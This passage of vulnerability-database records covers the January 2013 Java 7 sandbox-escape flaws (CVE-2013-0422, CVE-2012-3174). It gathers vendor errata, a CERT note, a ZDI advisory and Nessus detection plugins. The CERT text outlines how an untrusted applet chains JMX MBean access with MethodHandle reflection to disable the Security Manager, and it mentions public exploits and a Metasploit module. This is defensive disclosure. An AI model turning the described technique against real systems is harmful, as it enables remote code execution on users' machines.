"AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T14:34:24", "bulletinFamily": "unix", "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "description": "Oracle Java SE version 7 includes the Oracle Java Runtime Environment and\nthe Oracle Java Software Development Kit.\n\nThis update fixes two vulnerabilities in the Oracle Java Runtime\nEnvironment and the Oracle Java Software Development Kit. Further\ninformation about these flaws can be found on the Oracle Security Alert\npage, listed in the References section. 
(CVE-2012-3174, CVE-2013-0422)\n\nRed Hat is aware that a public exploit for CVE-2013-0422 is available that\nexecutes code without user interaction when a user visits a malicious web\npage using a browser with the Oracle Java 7 web browser plug-in enabled.\n\nAll users of java-1.7.0-oracle are advised to upgrade to these updated\npackages, which provide Oracle Java 7 Update 11 and resolve these issues.\nAll running instances of Oracle Java must be restarted for the update to\ntake effect.\n", "modified": "2018-06-07T09:04:15", "published": "2013-01-14T05:00:00", "id": "RHSA-2013:0156", "href": "https://access.redhat.com/errata/RHSA-2013:0156", "type": "redhat", "title": "(RHSA-2013:0156) Critical: java-1.7.0-oracle security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:21", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1541", "CVE-2012-3174", "CVE-2012-3213", "CVE-2012-3342", "CVE-2012-5085", "CVE-2013-0351", "CVE-2013-0409", "CVE-2013-0419", "CVE-2013-0422", "CVE-2013-0423", "CVE-2013-0424", "CVE-2013-0425", "CVE-2013-0426", "CVE-2013-0427", "CVE-2013-0428", "CVE-2013-0431", "CVE-2013-0432", "CVE-2013-0433", "CVE-2013-0434", "CVE-2013-0435", "CVE-2013-0437", "CVE-2013-0438", "CVE-2013-0440", "CVE-2013-0441", "CVE-2013-0442", "CVE-2013-0443", "CVE-2013-0444", "CVE-2013-0445", "CVE-2013-0446", "CVE-2013-0449", "CVE-2013-0450", "CVE-2013-0809", "CVE-2013-1473", "CVE-2013-1476", "CVE-2013-1478", "CVE-2013-1480", "CVE-2013-1484", "CVE-2013-1485", "CVE-2013-1486", "CVE-2013-1487", "CVE-2013-1493"], "description": "IBM Java SE version 7 includes the IBM Java Runtime Environment and the IBM\nJava Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java Runtime\nEnvironment and the IBM Java Software Development Kit. Detailed\nvulnerability descriptions are linked from the IBM Security alerts page,\nlisted in the References section. 
(CVE-2012-1541, CVE-2012-3174,\nCVE-2012-3213, CVE-2012-3342, CVE-2013-0351, CVE-2013-0409, CVE-2013-0419,\nCVE-2013-0422, CVE-2013-0423, CVE-2013-0424, CVE-2013-0425, CVE-2013-0426,\nCVE-2013-0427, CVE-2013-0428, CVE-2013-0431, CVE-2013-0432, CVE-2013-0433,\nCVE-2013-0434, CVE-2013-0435, CVE-2013-0437, CVE-2013-0438, CVE-2013-0440,\nCVE-2013-0441, CVE-2013-0442, CVE-2013-0443, CVE-2013-0444, CVE-2013-0445,\nCVE-2013-0446, CVE-2013-0449, CVE-2013-0450, CVE-2013-0809, CVE-2013-1473,\nCVE-2013-1476, CVE-2013-1478, CVE-2013-1480, CVE-2013-1484, CVE-2013-1485,\nCVE-2013-1486, CVE-2013-1487, CVE-2013-1493)\n\nAll users of java-1.7.0-ibm are advised to upgrade to these updated\npackages, containing the IBM Java SE 7 SR4 release. All running instances\nof IBM Java must be restarted for the update to take effect.\n", "modified": "2018-06-07T09:04:36", "published": "2013-03-11T04:00:00", "id": "RHSA-2013:0626", "href": "https://access.redhat.com/errata/RHSA-2013:0626", "type": "redhat", "title": "(RHSA-2013:0626) Critical: java-1.7.0-ibm security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2020-09-18T20:41:54", "bulletinFamily": "info", "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "description": "### Overview \n\nJava 7 Update 10 and earlier versions of Java 7 contain a vulnerability that can allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system.\n\n### Description \n\nThe Oracle Java Runtime Environment (JRE) 1.7 allows users to run Java applications in a browser or as standalone programs. Oracle has made the JRE available for multiple operating systems. 
OpenJDK is an open-source implementation of the Java platform, and the IcedTea project aims to make it easier to deploy OpenJDK, including a web browser plugin.\n\nThe Java JRE plug-in provides its own [Security Manager](<http://docs.oracle.com/javase/7/docs/api/java/lang/System.html#setSecurityManager%28java.lang.SecurityManager%29>). Typically, a web applet runs with a security manager provided by the browser or Java Web Start plugin. Oracle's document [states](<http://docs.oracle.com/javase/1.5.0/docs/api/java/lang/System.html#setSecurityManager%28java.lang.SecurityManager%29>), _\"If there is a security manager already installed, this method first calls the security manager's _`_checkPermission_`_ method with a _`_RuntimePermission(\"setSecurityManager\")_`_ permission to ensure it's safe to replace the existing security manager. This may result in throwing a _`_SecurityException\"_`_._ \n \nBy leveraging a vulnerability in the [Java Management Extensions](<http://docs.oracle.com/javase/tutorial/jmx/index.html>) (JMX) [MBean](<http://docs.oracle.com/javase/tutorial/jmx/mbeans/index.html>) components, unprivileged Java code can access restricted classes. By using that vulnerability in conjunction with a second vulnerability involving recursive use of the Reflection API via the [invokeWithArguments](<http://docs.oracle.com/javase/7/docs/api/java/lang/invoke/MethodHandle.html#invokeWithArguments%28java.util.List%29>) method of the [MethodHandle](<http://docs.oracle.com/javase/7/docs/api/java/lang/invoke/MethodHandle.html>) class, an untrusted Java applet can escalate its privileges by calling the [setSecurityManager()](<http://docs.oracle.com/javase/1.5.0/docs/api/java/lang/System.html#setSecurityManager%28java.lang.SecurityManager%29>) function to allow full privileges, without requiring code signing. Oracle Java 7 update 10 and earlier Java 7 versions are affected. 
OpenJDK 7, and subsequently [IcedTea](<http://permalink.gmane.org/gmane.comp.java.openjdk.distro-packaging.devel/21381>), are also [affected](<https://bugzilla.redhat.com/show_bug.cgi?id=894172>). The invokeWithArguments method was introduced with Java 7, so Java 6 is not affected. \n \nThis vulnerability is being attacked in the wild, and is reported to be incorporated into exploit kits. Exploit code for this vulnerability is also publicly available. We have confirmed that Oracle Java 7 installed on Windows, OS X, and Linux platforms is affected. Other platforms that use Oracle Java 7 may also be affected. \n \n--- \n \n### Impact \n\nBy convincing a user to visit a specially crafted HTML document, a remote attacker may be able to execute arbitrary code on a vulnerable system. Note that applications that use the Internet Explorer web content rendering components, such as Microsoft Office or Windows Desktop Search, may also be used as an attack vector for this vulnerability. \n \n--- \n \n### Solution \n\n**Apply an update** \n \n[Oracle Security Alert CVE-2013-0422](<http://www.oracle.com/technetwork/topics/security/alert-cve-2013-0422-1896849.html>) states that [Java 7 Update 11](<http://www.oracle.com/technetwork/java/javase/7u11-relnotes-1896856.html>) addresses this (CVE-2013-0422) and an equally severe, but distinct vulnerability (CVE-2012-3174). Immunity [has indicated](<http://immunityproducts.blogspot.ca/2013/01/confirmed-java-only-fixed-one-of-two.html>) that only the reflection vulnerability has been fixed and that the JMX MBean vulnerability remains. Java 7u11 sets the default Java security settings to \"High\" so that users will be prompted before running unsigned or self-signed Java applets. \n \nUnless it is absolutely necessary to run Java in web browsers, disable it as described below, even after updating to 7u11. This will help mitigate other Java vulnerabilities that may be discovered in the future. 
\n \nThis issue has also been addressed in [IcedTea versions 2.1.4, 2.2.4, and 2.3.4](<http://mail.openjdk.java.net/pipermail/distro-pkg-dev/2013-January/021413.html>). \n \n--- \n \n**Disable Java in web browsers**\n\nStarting with Java 7 Update 10, it is possible to [disable Java content in web browsers](<http://www.java.com/en/download/help/disable_browser.xml>) through the Java control panel applet. Please see the [Java documentation](<http://docs.oracle.com/javase/7/docs/technotes/guides/jweb/client-security.html#disable>) for more details. \n \n**Note**: Due to what appears to potentially be a bug in the Java installer, the Java Control Panel applet may be missing on some Windows systems. In such cases, the Java Control Panel applet may be launched by finding and executing `javacpl.exe` manually. This file is likely to be found in `C:\\Program Files\\Java\\jre7\\bin` or `C:\\Program Files (x86)\\Java\\jre7\\bin`. \n \n**Also note** that we have encountered situations on Windows where Java will crash if it has been disabled in the web browser as described above and then subsequently re-enabled. Depending on the browser used, [Michael Horowitz has pointed out](<http://blogs.computerworld.com/cybercrime-and-hacking/21664/understanding-new-security-java-7-update-11>) that performing the same steps on Windows 7 will result in unsigned Java applets executing without prompting in Internet Explorer, despite what the \"Security Level\" slider in the Java Control panel applet is configured to use. We have confirmed this behavior with Internet Explorer on both Windows 7 and Vista. Reinstalling Java appears to correct both of these situations. \n \nSystem administrators wishing to deploy Java 7 Update 10 or later with the \"Enable Java content in the browser\" feature disabled can invoke the Java installer with the `WEB_JAVA=0` command-line option. 
More details are available in the [Java documentation](<http://docs.oracle.com/javase/7/docs/technotes/guides/jweb/client-security.html#install>). \n \nAlternatively, Microsoft has released a [Fix it](<http://blogs.technet.com/b/srd/archive/2013/05/29/java-when-you-cannot-let-go.aspx>) that disables Java in the Internet Explorer web browser. \n \n**Restrict access to Java applets** \n \nNetwork administrators unable to disable Java in web browsers may be able to help mitigate this and other Java vulnerabilities by restricting access to Java applets. This may be accomplished by using proxy server rules, for example. Blocking or whitelisting web requests to `.jar` and `.class` files can help to prevent Java from being used by untrusted sources. Filtering requests that contain a Java User-Agent header may also be effective. For example, this technique can be used in environments where Java is required on the local intranet. The proxy can be configured to allow Java requests locally, but block them when the destination is a site on the internet. \n \n--- \n \n### Vendor Information\n\n625617\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. 
Click here to view vendors.**\n\n### IcedTea Affected\n\nUpdated: January 16, 2013 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://permalink.gmane.org/gmane.comp.java.openjdk.distro-packaging.devel/21381>\n * <http://mail.openjdk.java.net/pipermail/distro-pkg-dev/2013-January/021413.html>\n\n### OpenJDK Affected\n\nUpdated: January 14, 2013 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://access.redhat.com/security/cve/CVE-2013-0422>\n\n### Oracle Corporation Affected\n\nNotified: January 11, 2013 Updated: January 13, 2013 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://blogs.oracle.com/security/entry/security_alert_for_cve_2013>\n * <http://www.oracle.com/technetwork/topics/security/alert-cve-2013-0422-1896849.html>\n * <http://www.oracle.com/technetwork/java/javase/7u11-relnotes-1896856.html>\n\n### Red Hat, Inc. Affected\n\nUpdated: January 17, 2013 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://rhn.redhat.com/errata/RHSA-2013-0165.html>\n * <https://bugzilla.redhat.com/show_bug.cgi?id=894172>\n\n### Sun Microsystems, Inc. 
Affected\n\nNotified: January 11, 2013 Updated: January 12, 2013 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### IBM Corporation Not Affected\n\nNotified: January 14, 2013 Updated: January 14, 2013 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://www-304.ibm.com/connections/blogs/PSIRT/entry/oracle_java_7_security_manager_bypass_vulnerability_cve_2013_04224>\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 10 | AV:N/AC:L/Au:N/C:C/I:C/A:C \nTemporal | 9.5 | E:H/RL:W/RC:C \nEnvironmental | 9.5 | CDP:ND/TD:H/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <https://krebsonsecurity.com/2013/01/what-you-need-to-know-about-the-java-exploit/>\n * <http://malware.dontneedcoffee.com/2013/01/0-day-17u10-spotted-in-while-disable.html>\n * <http://labs.alienvault.com/labs/index.php/2013/new-year-new-java-zeroday/>\n * <http://seclists.org/bugtraq/2013/Jan/48>\n * <http://seclists.org/fulldisclosure/2013/Jan/77>\n * <http://www.security-explorations.com/materials/SE-2012-01-ORACLE-5.pdf>\n * <http://docs.oracle.com/javase/7/docs/api/java/lang/invoke/MethodHandle.html#invokeWithArguments%28java.util.List%29>\n * <http://www.java.com/en/download/help/disable_browser.xml>\n * <https://partners.immunityinc.com/idocs/Java%20MBeanInstantiator.findClass%200day%20Analysis.pdf>\n * <https://blogs.oracle.com/security/entry/security_alert_for_cve_2013>\n * <http://www.oracle.com/technetwork/topics/security/alert-cve-2013-0422-1896849.html>\n * <http://www.oracle.com/technetwork/java/javase/7u11-relnotes-1896856.html>\n * <https://bugzilla.redhat.com/show_bug.cgi?id=894172>\n * 
<https://partners.immunityinc.com/idocs/Java%20MBeanInstantiator.findClass%200day%20Analysis.pdf>\n * <http://immunityproducts.blogspot.ca/2013/01/confirmed-java-only-fixed-one-of-two.html>\n * <https://www-304.ibm.com/connections/blogs/PSIRT/entry/oracle_java_7_security_manager_bypass_vulnerability_cve_2013_04224>\n * <http://permalink.gmane.org/gmane.comp.java.openjdk.distro-packaging.devel/21381>\n * <http://mail.openjdk.java.net/pipermail/distro-pkg-dev/2013-January/021413.html>\n * <http://blogs.computerworld.com/cybercrime-and-hacking/21664/understanding-new-security-java-7-update-11>\n * <http://codeascraft.etsy.com/2013/03/18/java-not-even-once/>\n\n### Acknowledgements\n\nThanks to Kafeine for reporting this vulnerability.\n\nThis document was written by Will Dormann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2013-0422](<http://web.nvd.nist.gov/vuln/detail/CVE-2013-0422>) \n---|--- \n**Date Public:** | 2013-01-10 \n**Date First Published:** | 2013-01-10 \n**Date Last Updated: ** | 2013-06-12 18:29 UTC \n**Document Revision: ** | 143 \n", "modified": "2013-06-12T18:29:00", "published": "2013-01-10T00:00:00", "id": "VU:625617", "href": "https://www.kb.cert.org/vuls/id/625617", "type": "cert", "title": "Java 7 fails to restrict access to privileged code", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdi": [{"lastseen": "2020-06-22T11:42:21", "bulletinFamily": "info", "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of the Oracle Java Runtime Environment. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific bypass exists within usage of MethodHandle to the invoke method in the sun.misc.reflect.Trampoline class. 
This allows a malicious applet to execute attacker-supplied code resulting in remote code execution under the context of the current user.", "modified": "2013-06-22T00:00:00", "published": "2013-02-01T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-13-002/", "id": "ZDI-13-002", "title": "Oracle Java Runtime Environment MethodHandle Security Manager Bypass Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:34:49", "bulletinFamily": "unix", "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "description": "[1.7.0.9-2.3.4.1.0.1.el6_3]\n- Update DISTRO_NAME in specfile\n[1.7.0.9-2.3.4.1.el6]\n- Reverted to IcedTea 2.3.4\n - reverted patch105: java-1.7.0-openjdk-disable-system-lcms.patch\n - removed jxmd and idlj to alternatives\n - make NOT executed with DISABLE_INTREE_EC=true and UNLIMITED_CRYPTO=true\n - re-applied patch302 and restored systemtap.patch\n - buildver set to 9\n - icedtea_version set to 2.3.4\n - unapplied patch112 java-1.7.openjdk-doNotUseDisabledEcc.patch\n - restored tmp-patches source tarball\n - removed /lib/security/US_export_policy.jar and lib/security/local_policy.jar\n - java-1.7.0-openjdk-java-access-bridge-security.patch's path moved from\n java.security-linux back to java.security\n- Resolves: rhbz#895033\n[1.7.0.11-2.4.0.1.el6]\n- Rewritten patch105: java-1.7.0-openjdk-disable-system-lcms.patch\n- Added jxmd and idlj to alternatives\n- make executed with DISABLE_INTREE_EC=true and UNLIMITED_CRYPTO=true\n- Unapplied patch302 and deleted systemtap.patch\n- buildver increased to 11\n- icedtea_version set to 2.4.0\n- Added and applied patch112 java-1.7.openjdk-doNotUseDisabledEcc.patch\n- removed tmp-patches source tarball\n- Added /lib/security/US_export_policy.jar and lib/security/local_policy.jar\n- Resolves: rhbz#895033", "edition": 4, "modified": "2013-01-16T00:00:00", "published": "2013-01-16T00:00:00", "id": 
"ELSA-2013-0165", "href": "http://linux.oracle.com/errata/ELSA-2013-0165.html", "title": "java-1.7.0-openjdk security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2020-09-25T08:55:36", "description": "From Red Hat Security Advisory 2013:0165 :\n\nUpdated java-1.7.0-openjdk packages that fix two security issues are\nnow available for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThese packages provide the OpenJDK 7 Java Runtime Environment and the\nOpenJDK 7 Software Development Kit.\n\nTwo improper permission check issues were discovered in the reflection\nAPI in OpenJDK. An untrusted Java application or applet could use\nthese flaws to bypass Java sandbox restrictions. (CVE-2012-3174,\nCVE-2013-0422)\n\nThis erratum also upgrades the OpenJDK package to IcedTea7 2.3.4.\nRefer to the NEWS file, linked to in the References, for further\ninformation.\n\nAll users of java-1.7.0-openjdk are advised to upgrade to these\nupdated packages, which resolve these issues. 
All running instances of\nOpenJDK Java must be restarted for the update to take effect.", "edition": 20, "published": "2013-07-12T00:00:00", "title": "Oracle Linux 5 / 6 : java-1.7.0-openjdk (ELSA-2013-0165)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "modified": "2013-07-12T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:java-1.7.0-openjdk-devel", "p-cpe:/a:oracle:linux:java-1.7.0-openjdk-javadoc", "p-cpe:/a:oracle:linux:java-1.7.0-openjdk-src", "p-cpe:/a:oracle:linux:java-1.7.0-openjdk-demo", "cpe:/o:oracle:linux:5", "p-cpe:/a:oracle:linux:java-1.7.0-openjdk"], "id": "ORACLELINUX_ELSA-2013-0165.NASL", "href": "https://www.tenable.com/plugins/nessus/68709", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2013:0165 and \n# Oracle Linux Security Advisory ELSA-2013-0165 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(68709);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/24\");\n\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n script_bugtraq_id(57246, 57312);\n script_xref(name:\"RHSA\", value:\"2013:0165\");\n\n script_name(english:\"Oracle Linux 5 / 6 : java-1.7.0-openjdk (ELSA-2013-0165)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2013:0165 :\n\nUpdated java-1.7.0-openjdk packages that fix two security issues are\nnow available for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. 
Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThese packages provide the OpenJDK 7 Java Runtime Environment and the\nOpenJDK 7 Software Development Kit.\n\nTwo improper permission check issues were discovered in the reflection\nAPI in OpenJDK. An untrusted Java application or applet could use\nthese flaws to bypass Java sandbox restrictions. (CVE-2012-3174,\nCVE-2013-0422)\n\nThis erratum also upgrades the OpenJDK package to IcedTea7 2.3.4.\nRefer to the NEWS file, linked to in the References, for further\ninformation.\n\nAll users of java-1.7.0-openjdk are advised to upgrade to these\nupdated packages, which resolve these issues. All running instances of\nOpenJDK Java must be restarted for the update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2013-January/003210.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2013-January/003211.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected java-1.7.0-openjdk packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Java Applet JMX Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n 
script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:java-1.7.0-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:java-1.7.0-openjdk-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:java-1.7.0-openjdk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:java-1.7.0-openjdk-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:java-1.7.0-openjdk-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/01/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5 / 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"java-1.7.0-openjdk-1.7.0.9-2.3.4.0.1.el5_9.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"java-1.7.0-openjdk-demo-1.7.0.9-2.3.4.0.1.el5_9.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"java-1.7.0-openjdk-devel-1.7.0.9-2.3.4.0.1.el5_9.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"java-1.7.0-openjdk-javadoc-1.7.0.9-2.3.4.0.1.el5_9.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"java-1.7.0-openjdk-src-1.7.0.9-2.3.4.0.1.el5_9.1\")) flag++;\n\nif (rpm_check(release:\"EL6\", 
reference:\"java-1.7.0-openjdk-1.7.0.9-2.3.4.1.0.1.el6_3\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"java-1.7.0-openjdk-demo-1.7.0.9-2.3.4.1.0.1.el6_3\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"java-1.7.0-openjdk-devel-1.7.0.9-2.3.4.1.0.1.el6_3\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"java-1.7.0-openjdk-javadoc-1.7.0.9-2.3.4.1.0.1.el6_3\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"java-1.7.0-openjdk-src-1.7.0.9-2.3.4.1.0.1.el6_3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1.7.0-openjdk / java-1.7.0-openjdk-demo / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-25T09:14:30", "description": "Updated java-1.7.0-oracle packages that fix two security issues are\nnow available for Red Hat Enterprise Linux 5 and 6 Supplementary.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nOracle Java SE version 7 includes the Oracle Java Runtime Environment\nand the Oracle Java Software Development Kit.\n\nThis update fixes two vulnerabilities in the Oracle Java Runtime\nEnvironment and the Oracle Java Software Development Kit. Further\ninformation about these flaws can be found on the Oracle Security\nAlert page, listed in the References section. 
(CVE-2012-3174,\nCVE-2013-0422)\n\nRed Hat is aware that a public exploit for CVE-2013-0422 is available\nthat executes code without user interaction when a user visits a\nmalicious web page using a browser with the Oracle Java 7 web browser\nplug-in enabled.\n\nAll users of java-1.7.0-oracle are advised to upgrade to these updated\npackages, which provide Oracle Java 7 Update 11 and resolve these\nissues. All running instances of Oracle Java must be restarted for the\nupdate to take effect.", "edition": 20, "published": "2013-01-15T00:00:00", "title": "RHEL 5 / 6 : java-1.7.0-oracle (RHSA-2013:0156)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "modified": "2013-01-15T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:java-1.7.0-oracle-javafx", "p-cpe:/a:redhat:enterprise_linux:java-1.7.0-oracle-src", "cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:java-1.7.0-oracle-devel", "p-cpe:/a:redhat:enterprise_linux:java-1.7.0-oracle-jdbc", "p-cpe:/a:redhat:enterprise_linux:java-1.7.0-oracle", "cpe:/o:redhat:enterprise_linux:6", "p-cpe:/a:redhat:enterprise_linux:java-1.7.0-oracle-plugin"], "id": "REDHAT-RHSA-2013-0156.NASL", "href": "https://www.tenable.com/plugins/nessus/63534", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2013:0156. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(63534);\n script_version (\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/24\");\n\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n script_bugtraq_id(57246, 57312);\n script_xref(name:\"RHSA\", value:\"2013:0156\");\n\n script_name(english:\"RHEL 5 / 6 : java-1.7.0-oracle (RHSA-2013:0156)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated java-1.7.0-oracle packages that fix two security issues are\nnow available for Red Hat Enterprise Linux 5 and 6 Supplementary.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. Common Vulnerability Scoring System 